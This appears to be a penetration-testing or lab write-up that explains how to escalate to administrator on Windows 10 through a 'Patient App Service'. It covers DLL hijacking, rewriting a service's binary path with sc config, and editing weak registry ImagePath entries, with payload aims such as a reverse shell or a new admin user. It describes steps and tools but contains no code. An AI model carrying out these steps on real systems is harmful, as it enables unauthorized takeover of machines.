1. Identify the Vulnerable Application: Confirm that the Patient App Service (C:\Program files\
myPatientApp.exe) loads a DLL from its directory. Use tools like Dependency Walker or Process
Monitor to monitor which DLLs the application loads.

o Techniques:

 Monitor the application startup process to identify all DLLs being loaded.

 Ensure that the application runs with administrative privileges, which can be
confirmed through process analysis tools.

2. Create a Malicious DLL: Develop a DLL with the same name as the legitimate one, containing
malicious code to execute with the application's privileges. This DLL will execute code to elevate
privileges or create a backdoor.

o Techniques:

 Write the DLL in C/C++ and include functions that will be called by the
application, embedding malicious payloads.

 Include code to add a new administrative user or execute a reverse shell.

3. Replace or Place the Malicious DLL: Place the malicious DLL in the application directory (C:\
Program files\). Ensure the malicious DLL is in the directory where the application looks for it.

o Techniques:

 Ensure proper file naming and positioning, overriding the original DLL or placing
it in a location where it will be loaded first.

 Confirm the DLL path is not protected by Windows File Protection to avoid
automatic replacement by the system.

4. Execute the Application: Once the application runs, it will load the malicious DLL, granting the
attacker the application's privileges, which may include administrative privileges.

o Techniques:

 Restart the application manually or through a script to ensure it loads the

malicious DLL.
  Use a scheduled task to ensure the application runs and loads the malicious DLL
at a specified time.

Tools: DLL Creator tools, Metasploit’s msfvenom for creating malicious payloads. Other Tools: Custom
scripting, C/C++ for writing DLLs.

2. Exploiting Insecure Service Permissions (Most Effective)

This method involves exploiting a service that runs with elevated privileges but has misconfigured
permissions allowing modifications.

Steps:

1. Identify the Service: Use tools to identify services with misconfigured permissions. The Patient
App Service should be checked for permission issues.

o Techniques:

 Use enumeration tools like Accesschk to list all services and their permissions.

 Identify services running with SYSTEM or administrative privileges.

2. Check Service Permissions: Determine if you have write permissions to the service binary path
or parameters.

o Techniques:

 Use tools like Accesschk to check for writable permissions on service

executables.

 Verify WRITE_DAC or WRITE_OWNER permissions on the service.

3. Modify the Service Path or Parameters: If writable, change the binary path to point to a
malicious executable or change parameters to load a malicious DLL.

o Techniques:

 Modify the ImagePath of the service to point to a malicious executable by using

commands like sc config or PowerShell scripts.

 Change service configuration using tools like sc or registry editing to load a

malicious DLL.

4. Restart the Service: Restart the service to execute the malicious code with elevated privileges.

o Techniques:

 Use system commands like net stop and net start to restart the service.

 Schedule a task to restart the service if immediate restart is not possible.

Tools: Accesschk from Sysinternals for checking service permissions. Other Tools: PowerShell scripts,
Metasploit for service exploitation, Process Hacker.
Extra Detail:

 Enumeration: Use tools like accesschk to enumerate service permissions thoroughly. Check for
any WRITE_DAC or WRITE_OWNER permissions that can be exploited.

 Modification: Use sc config or similar commands to change the binary path or parameters of the
service. This can involve editing the registry or using administrative tools.

 Execution: Use system tools or commands to restart the service, ensuring the malicious code
executes.

3. Exploiting Weak Registry Permissions

Windows services often have registry entries that define how they operate. If these registry entries have
weak permissions, they can be exploited to escalate privileges.

Steps:

1. Identify Vulnerable Registry Entries: Locate the registry keys associated with the Patient App
Service using tools that can enumerate registry permissions, such as Accesschk or Regshot.

o Techniques:

 Use registry enumeration tools to list keys and permissions.

 Identify registry keys that control service execution, typically found in HKLM\
SYSTEM\CurrentControlSet\Services\.

2. Check Registry Key Permissions: Verify if the permissions on the registry keys allow
modification.

o Techniques:

 Check for Full Control or Write permissions on registry keys using tools like
Accesschk.

 Use registry editing tools to verify who can modify the keys.

3. Modify the Registry Entry: Change the registry entry to point to a malicious executable or script.

o Techniques:

 Modify ImagePath or similar values in the registry to a malicious executable

using Regedit or reg command line tool.

 Change other relevant keys to ensure execution of malicious code.

4. Trigger the Service: Restart the service or trigger it in a way that it executes the malicious code
from the modified registry entry.

o Techniques:

 Restart the system to ensure the service runs with the modified registry keys.
  Use scheduled tasks or service control commands to trigger the service.

Tools: Accesschk for checking registry permissions, Regedit for manual editing. Other Tools: PowerShell
scripts, Metasploit for registry exploitation.

Additional Details:

 Enumeration: Carefully enumerate the service-related registry keys for permission issues using
tools like Accesschk and Regshot.

 Modification: Modify the ImagePath or other relevant values in the registry to point to a
malicious executable. Ensure changes are correctly applied.

 Execution: Ensure that the service restart or system reboot triggers the execution of the
malicious code by setting appropriate triggers and ensuring the service restarts correctly.

By focusing on these methods, particularly exploiting insecure service permissions, you can effectively
gain administrative privileges on a Windows 10 computer by leveraging the vulnerabilities in the Patient
App Service.